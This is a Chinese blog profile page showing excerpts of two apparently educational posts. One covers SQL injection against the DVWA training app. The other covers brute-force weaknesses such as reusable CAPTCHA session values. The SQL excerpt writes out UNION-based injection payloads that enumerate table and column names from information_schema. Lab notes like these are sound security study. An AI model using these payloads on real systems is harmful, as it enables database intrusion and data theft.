- 博客(2)
- 收藏
- 关注
原创 SQL注入
输入 1' union select 1,group_concat(hex(column_name)) from information_schema.columns where table_schema = 'users' #输入 1' union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema = 'dvwa' #方法:(以下皆是忽略sql语段中的引号,默认已经添上)
2023-10-31 17:20:22 23 1
原创 暴力破解相关点
(2)Token的定义:Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。产生的原理:一般提交的验证码会被与存储在服务器session中的验证码做验证,但是这道题由于在验证完成后,没有及时的销毁session,使用过的session值仍然可以重复使用,所以产生了可利用漏洞。前语:验证码三大方面的漏洞:可验证码错误->做了校验;
2023-10-31 17:16:22 26 2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人